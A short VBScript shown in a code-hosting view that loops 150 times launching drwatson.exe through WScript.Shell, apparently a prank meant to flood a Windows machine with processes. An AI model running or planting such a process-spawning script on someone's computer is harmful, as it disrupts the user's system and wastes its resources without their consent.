8 lines
172 B
Text
8 lines
172 B
Text
|
' theorangeone.net/pithos
|
||
|
Dim objShell
|
||
|
Set objShell = WScript.CreateObject( "WScript.Shell" )
|
||
|
|
||
|
for i= 0 to 150
|
||
|
objShell.Run("""drwatson.exe""")
|
||
|
next
|
||
|
Set objShell = Nothing
|